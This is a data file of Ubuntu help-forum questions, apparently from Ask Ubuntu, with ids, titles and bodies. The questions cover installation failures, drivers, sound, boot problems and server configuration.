348337	no '/etc ' files created during apache installation	i have installed apache using the follow command : ./configure -- with-apr=/usr/local/apr -- with-apr-util=/usr/local/apr-util -- with-pcre=/usr/local/pcre -- enable-so make sudo make install now apache is installed successfully ( no error message in terminal ) , i obviously want to run it . when i browse to /usr/local/apache2/bin/ and run it using sudo apachectl start it does however give me an error message . apache2 : could not open configuration file /etc/apache2/apache2.conf : no such file or directory action 'start ' failed . the apache error log may have more information . when i browse to /etc/ indeed there is no apache2 directory . why is this and what did i do wrong ? how do i fix this ?
348339	how to open pdf files directly in chromium-browser and run faster downloads from internet	i am a bit new in ubuntu , i installed it a week ago and i have some things more or less set but i am struggling with a couple things , if somebody kindly helpme . i have installed chromium-browser which i like more than firefox because of i think it is faster , but in my university 's virtual room they have some pdf files uploaded and chromium-browser wo n't open them directly online , it forces to download , i have installed flash player because of i was n't able to view youtube videos but is there another plugin or component which allow me to open pdf files without downloading ? thank you additional to that minor problem , when i want to download something in direct download , i have n't tried torrent but i do n't want such solution , is there a way to download the files faster without using any software for that task ? i mean : setting up something in the software . all i find are programs . thank you cheers .
348340	sync videos from ubuntu to sony walkman	on my old windows i used sonys `` media go '' to sync music and videos with the player . now , as wine does not install media go , i need an alternative to work with . i like to change my musicvideos on the player very often , so i need something that is working easy and fast , no hand-converting of videos or copys of every video in the right format for my player . is there any program capable of that ? which one do you use ?
348344	nautilus in ubuntu 13.04 opens underneath other windows	this applies to ubuntu 13.04 and not 12.04 . whenever i launch nautilus from the terminal by typing nautilus it is opened up beneath my other currently active windows . however this does not happen if i launch 'files ' from the launcher in the top left , which begs the question , what command is that running ? is there a way to resolve this so that nautilus will always open on top of everything else when launched by a terminal command ? here is a video demonstrating the issue . update it turns out that if you killall nautilus and then perform nautilus -- new-window -- no-desktop & nautilus will now pop up at the very top as expected . however now i can not see any desktop icons and 'expo ' shows every window as active .
348347	broadband mobile connection is n't visible	i have a e362 mobile usb cell stick from telus . i connected it and executed sudo modprobe usbserial vendor=0x12d1 product=0x1505 to load the according drivers . that gives me /dev/ttyusb0 link ! then i went ahead and created a mobile broadband connection wth the network manager but the drop down where i am supposed to select the device is disabled . i however can keep going and create the connection but it would n't let me select the device and hence , after creation , the network manager never offers me to connect to it . why not ? how can i select my correct /dev/ttyusb0 device ?
348349	how to get audio input from ubuntu touch device ?	how can i get the audio input in a simple touch ui app in ubuntu touch ? thanks in advance , boaz
348351	how can i install monodevelop v4 on 12.04 ?	i am using ubuntu 12.04 . i can install v2.8.6.3 of monodevelop from software center but i need at least v3 to use monogame v3 or higher . can anyone point me in the right direction please ? thanks
348353	which version is recommended for my system ?	my system specifications are : compaq presario model cpu : intel celeron ( r ) cpu 2.93ghz speed and memory : 2.95ghz , 632 mb of ram hard disc : 40 gb
348354	just installed unbunto via windows xp and cant log in	i have an eepc 904 with windows xp . today i downloaded the windows installer and it worked just fine . when i came to log in , it tells me my login and password are wrong ... its asking for the `` root '' login info ? total newbie so am a tad dumbfounded . i have noted a number of discussion re upgrading and people having the same issue . i 've tried some of their suggestions with no luck ... can you help ?
348356	unable to join meetings at adobe connect ?	i need to join some online meetings being held over adobe connect . after signing in , the meeting loading page opens and the progress bar goes from 0 to 100 % with the message as connecting ... however the meeting never connects and eventually , i get the error message : '' the meeting room could not connect to the adobe connect server . please re-launch the meeting room , or refresh your browser to restore the connection . '' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ on troubleshooting , i found that am missing the adobe connect add-in . but i am unable to get how i resolve this ?
348357	how can i use ubuntu live disk to get my data from a dead laptop hard drive ?	my hard drive crashed , so i 'm trying to retrieve the data on it using a ubuntu live disk . i can access the desktop , and from there i open `` files '' and try to open `` 1.0 tb volume , '' which ( i think ) is my hard drive . after a good bit of waiting , i receive the message : error mounting /dev/sda1 at /media/ubuntu/282e16d52e169bbe : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=999 , gid=999 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ubuntu/282e16d52e169bbe '' ' exited with non-zero exit status 13 : ntfs_attr_pread_i : ntfs_pread failed : input/output error failed to read hiberfil.sys : input/output error failed to mount '/dev/sda1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . i tried a system repair disk , but it spent about 8 hours `` fixing '' the problem and would have continued had i not shut it off . i do n't really mind waiting , but after 8 hours i doubt it would have done anything . what can i do about this ? please avoid using any words , phrases , or abbreviations that are too technical , as i am not very skilled with computers .
348360	why am i stopped from installing software from the software centre	i keep getting the following message : requires installation of untrusted packages how can i get round that ?
348361	how can i install the driver for my epson nx430 printer ?	i have a new printer , an epson nx430 . i 've followed the instructions so far and the printer is on and cartridges in . i need to install the drivers from epsons support website before i plug in the printer to the computer ( via usb ) . http : //download.ebz.epson.net/dsc/search/01/search/ ? osc=lx those are all the drivers . this is as far as i know how to go . i installed cups . now i need to know : 1. which drivers to install ( i 'll do them all i do n't care ) 2. how do i do that after i download the file ( it saves in my downloads folder ) i guess i need to know what to do once these driver files are on my computer . i would like to : print from my desktop print wirelessly from my laptop ( windows 7 ) i am new to linux .
348363	how to permit suid	i need to permit suid for my user account on my ubuntu 13.04 . according to the mount command the bit flag for my account is nosuid . how do i change it to suid .
348366	dell e6400 and wifi problem	i 'm trying to run a dell e6400 will ubuntu and having no success with getting on wifi . i 've tried all the stuff that i can understand after reading through the other threads . it all seems a bit old though . i 've got a clean install of ubuntu which i think adds to the problem i 'm having . if someone else out there has had this issue or knows the easiest fix i 'd sure appreciate someone sharing it here . thanks , dean .
348367	ubuntu touch compatible devices	i just want know if the ubuntu touch rom is compatible with my device : lg e400 ( l3 ) it 's not appear on the official list .
348368	how to review a complete process/application activity ?	in ubuntu is it possible to check for an application/process activity ? i want information like when the application/process started what files has been accessed by the application/process what i/o operations it have performed if application/process connected to internet , with what ip 's its communicated .
348369	browse abcmouse.com on ubuntu	i am trying to get ubuntu on home pc . sometimes my kid use that pc and he browses mostly abcmouse.com . my recent experience were that abcmouse.com does n't runs on ubuntu operating systems . is there a way i can run those sites or need to wait fom abcmouse.com officially available on linux machine which i do n't see going to happen soon .
348373	weird sound problems in ubuntu 13.04 - volume label not showing up	i 'm using ubuntu 13.04 with gnome . i 've recently had some weird problems with my sound . the speaker symbol in the system bar on top does not show up . to be more precise , just after logging in the symbol shows up for about 5 seconds and then disappears . in addition , under sound > output , there are no listed devices . nevertheless the sound is working but i just ca n't regulate the volume or mute the sound with the keyboard or with the gui . with alsamixer i am able to turn up and down the volume . but of course it would be more practical to just be able to use the keyboard for that . so could anybody help me with this ? all tips , advices , maybe even experiences with the same issue ... ? are welcome : ) thanks
348375	why does ubuntu 13.04 fails to start showing a purple screen and on restart shows a blank ( black ) screen with blinking cursor ?	i 've installed ubuntu 13.04 from my usb and straight away i got problems . i 've windows 7 installed in my pc . therefore i 've chosen ubuntu installation along side windows 7 . the problem i 'm facing is that ubuntu fails to start after installation . i 've reinstalled ubuntu 13.04 many times . but the problem seems to be there . the very first run after installation seems to be working fine . but on a next restart , the issue will pop up . the startup screen is showing that i 've got ubuntu and windows 7 installed in my pc . windows is working fine . but upon selecting ubuntu its showing a purple screen and i was forced to restart the pc using the restart button . upon restart , again the startup screen shows up . ( please note that the auto login countdown is not shown at this time ) . two os installed in the pc is listed down and this time the scenario is little bit different . now , selecting ubuntu will produce a black screen with blinking cursor . why is this happening ? i do n't know what is the real issue behind this . i lurked around various sites but could n't find a solution . i do n't know whether my hardware has got any relation with this issue . please help me . i 'm a newbie to ubuntu and i 'm really frustrated with this issue . the configuration of my pc is , intel i5 processor 2500k , intel h67 motherboard , 4gb ram , nvidia gt520 graphics card , and a 500gb hdd
348376	problem with `notify-send`	i have been working in a script to change audio output when you ( dis ) connect am hdmi screen/tv . basically it uses udev to check any change in the connection and acts accordingly . everything works fine except one thing : i ca n't use notify-send to warn about the change . i use the following code ( output is just a wrapper to subprocess.check_output ) : output ( `` sudo -u { 0 } notify-send \ '' { 1 } \ '' \ '' { 2 } \ '' '' .format ( user , title , message ) ) but i don get any notification at all . what is really odd is that if i run hdmi_sound_toggle ( as a normal user or with sudo ) everything works just fine ! so what could be the problem here ? there is any better way to present a notification than with notify-send ?
348379	installing windows 8 after ubuntu 13	i have install ubuntu and then resize ubuntu partition and install windows 8 now i ca n't boot into windows and grub dont't find windows on /dev/sda4 partition what do i need to do ? bootinfo : http : //paste.ubuntu.com/6137326/
348380	imposible actualizar	'e : vaya , excedió el número de descripciones que este apt es capaz de manejar. , e : problem with mergelist /var/lib/apt/lists/es.archive.ubuntu.com_ubuntu_dists_lucid-updates_universe_i18n_translation-es , e : no se pudieron analizar o abrir las listas de paquetes o el archivo de estado . ' este es el mensaje del sistema cuando intento actualizar . ¿algún consejo ? english translation ( using google tranlator ) : 'e : wow , you exceeded the number of descriptions this apt is capable of handling. , e : problem with mergelist / var/lib/apt/lists/es.archive.ubuntu.com_ubuntu_dists_lucid-updates_universe_i18n_translation-es , e : could not parsed or opened package lists or status file. ' this is the system message when i try to update . any advice ?
348382	ubuntu 13.4 multi monitors/multi graphics cards/ rotation	are there any links to configuring graphics for novice users ? will the 13.10 version be able to accomplish display settings in a normal fashion , right now in the display settings panel , i can not even drag my monitors around , or make other changes if they are all turned on . are there any links to configuring graphics for novice users ? cpu intel core i7 3770k @ 3.50ghz ivy bridge 22nm technology ram 16.0gb dual-channel ddr3 @ 800mhz ( 8-8-8-24 ) motherboard asustek computer inc. p8z77-v lk ( lga1155 ) graphics syncmaster ( 1200x1600 @ 60hz ) syncmaster ( 1200x1600 @ 60hz ) sms24a450 ( 1200x1920 @ 60hz ) intel hd graphics 4000 ( asustek computer inc ) 2048mb ati amd radeon hd 6900 series ( microsoft corporation - wddm v1.2 ) ( msi ) hard drives 128gb ocz vertex 3 optical drives lite-on dvdrw lh-20a1s audio high definition audio device
348383	chromebook crouton ram limit	my question : can ubuntu ( unity ) , ran through crouton on chrome os , utilize more than 3gb of ram ? is there any way to allocate resources to ubuntu ? can chrome os utilize more than 3gb ? i would like to upgrade my chromebook ( acer c7 ) to 8gb of ram for a smoother experience . i did some research and have seen mentions of the pae kernel and linux being able to utilize additional ram , but nothing specifically for instances running off chrome os . i am a linux noob , full disclosure .
348386	ubuntu doesnot recognize driver-select command	i have atheros ar8172 lan card in my lap.to instal driver i entered the below command sudo ./scripts/driver-select alx the output is sudo : ./scripts/driver-select : command not found i 'm using ubuntu 12.10 and my laptop is lenovo g500.someone please help me in this issue.thanks in advance .
348389	macbook air 4,1 fan control/temperature	my fans sometimes never seem to kick on , no matter how hot my computer gets . i am wondering if this could be tlp/acpid related ? perhaps not , but it happens mostly when i am plugged in to a power source . disconnecting the power source does n't seem to activate the fans , but it cools my computer down about 20f in 30 seconds . while plugged in , listening to music , and charging my iphone.. about 30 % cpu load and 40 % memory load ( the temp would keep climbing but im hesitant to let it , ive let it ride to 205f to see if the fans would kick on , but nothing ) : $ sensors -f coretemp-isa-0000 adapter : isa adapter physical id 0 : +192.2°f ( high = +186.8°f , crit = +212.0°f ) core 0 : +186.8°f ( high = +186.8°f , crit = +212.0°f ) core 1 : +192.2°f ( high = +186.8°f , crit = +212.0°f ) applesmc-isa-0300 adapter : isa adapter exhaust : 2005 rpm ( min = 2000 rpm , max = 6500 rpm ) tb0t : +88.7°f tb1t : +88.7°f tb2t : +84.2°f tc0c : +191.7°f tc0d : +191.7°f tc0e : +188.1°f tc0f : +191.7°f tc0p : +171.5°f tc1c : +185.0°f tc2c : +192.2°f tcgc : +190.4°f tcsa : +181.4°f th0f : +28.9°f th0j : +30.7°f th0o : +28.4°f thsp : +118.8°f tm0p : +151.2°f tpcd : +163.4°f ta0p : +134.1°f th1h : +104.0°f tm0p : +125.6°f tm1p : +129.6°f ts0p : +85.5°f ts0s : +105.8°f unplug , same load , about 45 seconds later ( and dropping ) : $ sensors -f coretemp-isa-0000 adapter : isa adapter physical id 0 : +179.6°f ( high = +186.8°f , crit = +212.0°f ) core 0 : +174.2°f ( high = +186.8°f , crit = +212.0°f ) core 1 : +179.6°f ( high = +186.8°f , crit = +212.0°f ) applesmc-isa-0300 adapter : isa adapter exhaust : 1997 rpm ( min = 2000 rpm , max = 6500 rpm ) tb0t : +90.0°f tb1t : +90.0°f tb2t : +85.5°f tc0c : +178.2°f tc0d : +178.7°f tc0e : +183.6°f tc0f : +187.2°f tc0p : +164.7°f tc1c : +174.2°f tc2c : +177.8°f tcgc : +176.0°f tcsa : +172.4°f th0f : +27.1°f th0j : +28.0°f th0o : +26.6°f thsp : +119.3°f tm0p : +150.3°f tpcd : +156.2°f ta0p : +133.7°f th1h : +103.5°f tm0p : +126.0°f tm1p : +128.3°f ts0p : +86.9°f ts0s : +106.7°f any help or thoughts ? i did at one point install smcfanctl or one of those variants , but have since removed it . edit : smcfancontrol will autocomplete in the terminal window , but there doesnt seem to be anything to remove or a man page , so i am confused as to exactly what this is $ which smcfancontrol /usr/local/sbin/smcfancontrol edit again : after allowing my computer to hover at about 180/200f by unplugging and plugging back in the power source repeatedly the fan has kicked on to 4500rpm , but is only cooling the cpu to about 170f at this speed .
348392	i want to put xubuntu 13.04 on an old laptop with windows 98 on it , can someone tell me how to put xubuntu on ?	i am just doing this for fun so please do n't give me some super long code to put in a terminal . i will post a picture once i get enough rep .
348393	how to run a minecraft server without port forwarding ?	i have been looking for a while and cant seem to find out how to run a minecraft server on linux without forwarding my ports . i can forward my ports because it is blocked in my router and i would really like to run a minecraft server . any help would be appreciated , thanks ! donât be afraid to ask for extra info !
348395	error while installing chromium through software center	whenever i try to download chromium it shows error : this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i took following steps : i went in ubuntu software center , went on the chromium page and clicked on the button `` install '' . then i got : `` check your internet connection '' along with the message i have pasted above , even though i have been connected to internet .
348397	getting continuously 5 beep sound after installing ubuntu 12.04.3 from startup	getting continuously 5 beep sound after installing ubuntu 12.04.3 from start up . the same thing happens to windows 7 but it stops after starting windows because there is option in windows to turn of this hardware beeps . is there any option to turn off beeps sound that starts from start up and continuous there on ?
348398	xorg x server tries to delete ubuntu-desktop , help !	i have recently installed ubuntu 12.04 on my asus eeepc cx1015 . video files , however are stuttering , and i figured the drivers are not installed . i went to synaptic , and chose to install the `` cedarview-graphics-driver '' , but it failed and told me : the following packages have unersolveable dependencies . make sure that all required repositories are added and enabled in the preferences . cedarview-graphics-drivers : depends : xserver-xorg-core ( > =2:1.10.99.901 ) depends : xorg-video-abi-11 i tried to install xserver-xorg-core but then it told me i had to remove a few packages . including one package called ubuntu-desktop , which is crazy . can anyone help me please ? i do n't know what to do ...
348400	how can i switch on vertical synchronization after wayland update ?	i have a laptop with an integrated intel vga , and with a discrete nvidia vga . after installing intel 's wayland update the vertical synchronization has been switched off system wide . how can i switch it on or back again ?
348401	what is a torrent client with cli that can handle about 7000 torrents ?	i want to mirror librivox.org , so i need a torrent client with an cli that can handle at least 7000 torrent files , and has a method to add those via bash script or something ( like torrentclient -- add ) . does someone now of a program that is able to do that ? edit : since almost all of the torrents are dead , it would be nice to have a client that can use `` webseeds '' whatever that is . transmission is able to use them , but it can not handle 7000 torrents , neither with gui nor with cli .
348402	can one use drivers from a different distribution on ubuntu ?	i have a laptop with canaima installed on it . it came bundled with the necessary drivers . my question is , can i use the same bundled drivers if i install ubuntu on it . i 'd appreciate a little help on the subject . thanks !
348404	which version have better support to use in integrated services router , ubuntu 12.04 or 13.04 ?	i will convert pc to router by using ubuntu . i did n't know which version is better ? thanks
348405	why the ubuntu 13.10 beta 1 iso files are so big ?	i was considering downloading the ubuntu 13.10 beta 1 iso file just to check out the new thing , but when you access the download page you see an 4.5 gb file available for download , so i got confused and curious . what is the reason for a so big iso file if when it 's released its size is reduced to almost 700 mb ( cd size ) ?
348408	installing ubuntu on hp pavilion g6	we have recently had a virus scare in my house . i 'm already on linux mint , so i did n't have to worry about it , ( it was for windows ) . i convinced my mom to try ubuntu on her laptop because i think it 's the most user friendly and easy for her . i am having a nightmare of a time installing it though . she has an hp pavilion g6 with windows 7 . all the hardware is exactly the same as when she bought it . i first defragmented her c drive , which is her only hard drive . after backing up her files on an external hard drive , i then created a 200 gb partition on her c drive for the installation . i tried two different versions of ubuntu and one of linux mint . they would n't boot from restart automatically , so i had to set the boot order in the bios . the all booted up but failed every time . the first i tried was a cd with ubuntu 13.04 . i know it works because i used it to install ubuntu on my custom built pc . when i booted it up , it showed a purple screen with the little person = keyboard thing at the bottom . after a couple seconds , it showed the normal ubuntu boot screen , with the logo on top and the five white dots that turn orange . after a while , all the dots went orange and then nothing happened . it was just stuck at that screen . i waited 20 minutes at least and it still was stuck at that screen . eventually the screen flashed black for a second and then showed the same boot screen with a white bar at the top . then everything went grainy and pixelated and the screen faded into white slowly . then it showed the boot screen again , then with the white bar at the top , then with the grainy pixelated screen , etc . it then reappeared with the boot screen with the white bar at the top and would n't change . i used an ubuntu 12.04 iso from usb . i had n't tested that one yet , but i downloaded it from the ubuntu website and i knew it downloaded properly . i lost the iso i downloaded for it , but the results were similar to the 13.04 boot . it showed the boot screen and would n't do anything else . i tried linux mint 15 cinnamon from usb which i knew worked because i installed that on my pc and it 's the os i currently use . it booted like normal and displayed the menu with `` start linux mint '' `` start in compatibility mode '' `` memory test '' and `` boot from local drive '' . selecting start linux mint brought the normal boot up screen with the linux mint logo , and after about a minut , it flashed dark with a white square in the upper left corner . the screen then went dark and would n't do anything no matter how long i left it . start in compatibility mode brought a bunch of computer text to flow across the screen then again in smaller letters . and then i was stuck at the small text . it said stuff like `` /init : line 7 : ca n't open /dev/sr0 : no medium found '' . i do n't know what to do . everything i tried has failed . please , if you know what 's wrong please help me . thank you
348422	beats audio problem	i am having hp pavillion dv6 7039tx ( http : //www.snapdeal.com/product/hp-pavilion-dv67039tx-laptop/220581 ) in windows 8 beats audio works properly and gives awesome sound quality but in ubuntu 13.04 i am having sound problem it 's very low i am a new bie.. plz provide me step by step guide if you can to gey good sound quality..thank u in advance ...
348427	ca n't save files in /var/www using lamp installed with tasksel	i just installed lamp with tasksel and it works . but inside /var/www i can create files only with sudo from terminal , i do n't know why . in another ubuntu installation i did n't have such problem . i created a file named index.php and i ca n't even save it . that 's the error i get from sublime text : unable to save /var/www/index.php error : unable to create tmp file in /var/www and that 's from geany : error opening file '/var/www/index.php ' : permission denied the file on disk may now be truncated !
348431	problem with ë character in ubuntu 13.04	hello guys i have ubuntu desktop 13.04 and i ca n't type ë . and why i press right ctrl + `` + e not displayed ë but another character . this characteré is not the same with this character ë can someone help me ?
348433	ca n't install ubuntu in lenovo ideapad u430	i just got my new laptop , a lenovo ideapad u430 , but i ca n't install ubuntu . i 'm not a complete noob , i 've installed ubuntu in other computers before , but this one is giving me problems . i got it to boot from the usb ( 13.04 ) but the first installation screen is barely visible , very , very dark , and nothing seems to work . if i press enter when the orange screen with the small keyboard logo appears , it gives me a menu to either install or use ubuntu , but if i choose any of the options it tries to start and then just freezes and the screen is either black or show some logs of what it was doing . if i try to install the 13.10 i get a black screen after the purple screen with the small keyboard icon on the bottom . i then tried and managed to install ubuntu 12.04 , it seems to work more or less , but when i upgraded the computer boots to a black screen , then only way to make it work is by booting with the 3.2 kernel . i reinstall ubunte 12.04 and as soon as i updated the kernel files same black screen . i would love to get ubuntu 13.10 working , but i need at least to be able to use the new kernels . these are the specs of my laptop : http : //www.notebookcheck.net/review-lenovo-ideapad-u430-touch-ultrabook.100623.0.html
348436	adding a custom icon ( for a hand written script ) to notification area xfce	i do n't use unity , and i wrote a simple script to start programs used in recording audio . ( jack , guitarix , etc ) i would like to know is there a command that will allow me to create an icon in the notification area of xfce 4 's panel ? also can i use this icon to kill all pid 's created by the script ? # ! /bin/bash qjackctl -s & jackpid= $ ! env sleep 2s guitarix & guitarixpid= $ ! # kill $ jackpid & kill $ guitarixpid exit i already have the pid 's stored to local variables , but these can easily be written to a file if necessary
348437	error while extracting files - `` error setting owner ''	i 'm using xubuntu 13.10 . downloaded eclipse . tried to extract the tar file and i got the error as seen in the image . i have tried the following : opened it up in the archive manager . it opens up properly . tried to downloaded it multiple times just to make sure the downloaded file is not corrupted . it is n't . changing permissions so that everyone can read write the file . tried to extract in different folders . please help me extract the file .
348438	how can i reset compiz settings to default ?	i 've installed ccsm and wanted to enable the wobbling window effect . this disabled some other things and suddenly i did n't have window borders any more ... following various instructions i found at google , i 've tried the following steps : go to ccsm settings / reset to defaults this disabled all plugins and effects ( including unity ) so i did n't get any further ... executing dconf reset -f /org/compiz and rebooting brought borders back , but still do n't have close/mini/maxi buttons , ca n't resize or move windows . and the top left entries of the menu bar vanished ( logout , battery , volume ... ) so i have to shutdown my computer via a terminal ... edit : following the instructions from the first answer . this brought my menu bar applets back ... dpkg-reconfigure did n't seem to work . result of this command : /var/lib/dpkg/info/compiz.config : 1 : /var/lib/dpkg/info/compiz.config : [ general ] : not found /var/lib/dpkg/info/compiz.config : 2 : /var/lib/dpkg/info/compiz.config : backend : not found /var/lib/dpkg/info/compiz.config : 3 : /var/lib/dpkg/info/compiz.config : plugin_list_autosort : not found /var/lib/dpkg/info/compiz.config : 5 : /var/lib/dpkg/info/compiz.config : [ gnome_session ] : not found /var/lib/dpkg/info/compiz.config : 6 : /var/lib/dpkg/info/compiz.config : backend : not found /var/lib/dpkg/info/compiz.config : 7 : /var/lib/dpkg/info/compiz.config : integration : not found /var/lib/dpkg/info/compiz.config : 8 : /var/lib/dpkg/info/compiz.config : plugin_list_autosort : not found /var/lib/dpkg/info/compiz.config : 9 : /var/lib/dpkg/info/compiz.config : profile : not found /var/lib/dpkg/info/compiz.config : 11 : /var/lib/dpkg/info/compiz.config : [ general_ubuntu ] : not found /var/lib/dpkg/info/compiz.config : 12 : /var/lib/dpkg/info/compiz.config : backend : not found /var/lib/dpkg/info/compiz.config : 13 : /var/lib/dpkg/info/compiz.config : integration : not found /var/lib/dpkg/info/compiz.config : 14 : /var/lib/dpkg/info/compiz.config : plugin_list_autosort : not found /var/lib/dpkg/info/compiz.config : 15 : /var/lib/dpkg/info/compiz.config : profile : not found is there any possibility to reset the settings like they were after installing ubuntu ? ps : using ubuntu 13.04 ( raring ) edit2 : just noticed that the title bar of windows is n't missing ; it 's just hidden under the menu bar . so the buttons are only hidden , too . edit3 : problem solved started ccsm , went to window management and checked scale windows and move windows ... after a relog everything was fine .
348439	iptables log file , and how change it	i have this rule in my iptables : iptables -ainput -s 192.168.11.0/24 -j log my question is : where is the iptables log file , and how can i change that ?
348441	denied write access outside of /home ?	i installed both extplorer on my server and vsftpd and i can not seem create or delete files outside of /home . so i can not go to /var/www and make a folder using ftp but ssh works fine . i 've not used the server in a while so i can not remember if i 've done something and forgot ? i am admin on my ftp server .
348442	how to update teeworlds version 0.6.1	i am currently running ubuntu 13.04 and am in capable of updating tee worlds . i go to the dev site and it directs me to the ubuntu app store . i un-install then reinstall but i am still on 0.6.1
348445	no sound ... how to re-enable pulseaudio ?	ok , back when i had 12 , i was using pulseaudio equalizer , and it worked great . but now the i have 13.04 , it does n't work , and there are no options under `` play sound through '' , where it used to say speakers , or headphones , when i had them plugged in . i assume this means i need to re-enable pulseaudio . how do i do so ? i 've tried reinstalling , and that has proven ineffective . ( ps : it works fine in the guest account . it 's just in this user that it 's not working for some reason . ) more : when i type `` pulseaudio '' in a terminal i get : e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed .
348446	ubuntu 13.04 - hogs up resources , hotter cpu , solution	i have recently switched from windows to linux , the overall experience was good but ubuntu 13.04 hogs up my resources and heats up the cpu more then my earlier windows7.also the battery backup has reduced significantly i am a big believer in free and open source s/w please help to sort out this issue so that i do not have to go back to windows .
348449	cross compiling to archlinux arm ?	what is the process to cross compile archlinux arm packages ? in particular is it possible to build packages from : http : //archlinuxarm.org/packages '' directly '' ? thanks
348452	where is my thunderbird after updating from ubuntu 12.04 to 13.04	after updating my ubuntu laptop from 12.04 to 'raring ringtail ' , i can not find thunderbird any more , it can only be started as `` empty '' programme which does not find my thunderbird profile ( saved on this laptop ) - it offers only the option `` create new profile '' . follow-up next day : i solved the problem myself using `` create new profile '' - opened a new account - let thunderbird search for my mail-server by entering my e-mail address ( which it did find although it is a small webserver in germany - not one of the big ones ) - entered the file name for my saved ( old ) profile in the settings - and there were all my previously organized local files .
348454	start noip application before login	how to start noip2 automatically before login ? i tried with this for 3 hours , editing /etc/rc.local , /etc/init.d/rc.local , running script /etc/init.d with update-rclocal , nothing seem to work , even reinstalled ubuntu . any hint ? : { ( 13.04 )
348456	trying to install ubuntu 12.04 need help	i want to install ubuntu 12.04 alongside windows7 but in the ubuntu installation the option run alongside windows 7 doesnt appear , and i want to know what i need to do to the partitions to do the dual/boot here s a screenshot of the partitions :
348459	unable to login after using kill -9 -1	i was using my ubuntu when suddenly , probably due to a lot of processes running , it stopped working . so i did ctrl+alt+f1 , and then searched for a command to kill the process which was causing all the trouble . i am a novice , so i thought that maybe `` kill '' might be some command to kill some process . so i typed `` man kill '' . there i saw `` kill -9 -1 '' as a command to kill all processes i can . i had never thought that it will permanently kill some important processes . now when i try to log in , a message comes displaying failed to load session `` ubuntu '' please help .
348461	how can i fix this error when i run sudo apt-get update command ?	w : failed to fetch http : //ppa.launchpad.net/docky-core/stable/ubuntu/dists/raring/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/docky-core/stable/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
348463	refind configuration : change boot order and default boot	i installed refind and it works great ! it immediately windows and ubuntu options and put them in a nice menu to choose from when i boot the computer . however , i found the configuration instructions intimidating and a little beyond my grasp . the first option is windows and windows loads if nothing is selected for 20 seconds . i would like for ubuntu to be the default that loads if nothing is selected . also , the first option for ubuntu is the grub menu . there are two more options after that , that appear to be for two versions of ubuntu . i would pick the first one instinctively , because it appears to be the most recent version . but my concern is , will i have to change this every time i get an updated version of ubuntu from software updates ? i tried changing this from efi boot manager in ubuntu terminal but it did n't change the order in refind .
348466	ca n't boot after installing ubuntu 13.04	just bought myself an intel nuc i5 with a intel 525 msata ssd 120gb . no previous os istalled , completly empty hdd . sata set to ahci installed ubuntu with no problem . `` restart computer to complete installation '' after restart i just get this message : pxe-061 : media test failure , check cable pxe-m0f : exiting intel boot agent tried to fix it with recommended boot-repair starting ubuntu from usb , this way : how to install the boot-repair tool in an ubuntu live disc ? http : //paste.ubuntu.com/6138214/ you can now reboot your computer . please do not forget to make your bios boot on sda ( 32.0gb ) disk ! could n't find sda `` ( 32.0gb ) disk '' in bios ... guessing it 's was my usbstick , its 32gb . and still get the same boot problem pxe-061 : media test failure , check cable pxe-m0f : exiting intel boot agent what to do ? hdd defect ? please help me ! /first time ubuntu/linux-user
348467	empathy-accounts replaced online accounts	in ubuntu empathy-accounts replaced by `` online accounts '' . i have not my account in it . how to run empathy-accounts ? where i can find clear tutorial for porting empathy-accounts to online-accounts ?
348468	ca n't login to a non-guest user after switching window mangers in blackbox	i was trying out blackbox recently and accidentally switched the window manager , causing the system to be unusable . thus , i rebooted and now at the login screen , i can type in my password to login and then click the button , but once i do i am simply kicked back to the login screen . the only account i can login to is guest for some reason . i am using ubuntu studio 13.04 , and my default desktop environment is xfce ( though i can not login to any de ) . here 's what i tried so far : uninstalling blackbox deleting xfce4 's config files deleting a blackbox-rc file in my home directory installing a new de running startxfce4 in the command line and here is the output of the .xsession-errors file : script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . blackbox : [ stylesdir/stylesmenu ] error , '/home/alex/.blackbox/styles ' does not exist blackbox : [ stylesdir/stylesmenu ] error , '/home/alex/.blackbox/styles ' does not exist blackbox : [ stylesdir/stylesmenu ] error , '/home/alex/.blackbox/styles ' does not exist ( xfwm4:3980 ) : glib-warning ** : ( /build/buildd/glib2.0-2.36.0/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! = 0 ) ( xfwm4:3980 ) : xfwm4-warning ** : failed to connect to session manager : failed to connect to the session manager : session_manager environment variable not defined xsession : x session started for root at fri sep 20 09:07:34 edt 2013 localuser : root being added to access control list script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . xsession : x session started for root at fri sep 20 09:10:05 edt 2013 localuser : root being added to access control list script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . xsession : x session started for alex at fri sep 20 10:37:20 edt 2013 localuser : alex being added to access control list script for cjkv started at run_im . script for default started at run_im . script for cjkv started at run_im . script for default started at run_im . any ideas on what could be causing this error ? i have access to the tty and guest account gui , so am able to change just about anything .
348472	samba virtual users	i currently allow my user accounts on my server to access their files though samba . i would like to add some virtual users . ie no shell access etc . i would ideally like a solution that used a mysql backend or even something as simple as a flat config file . thanks in advance
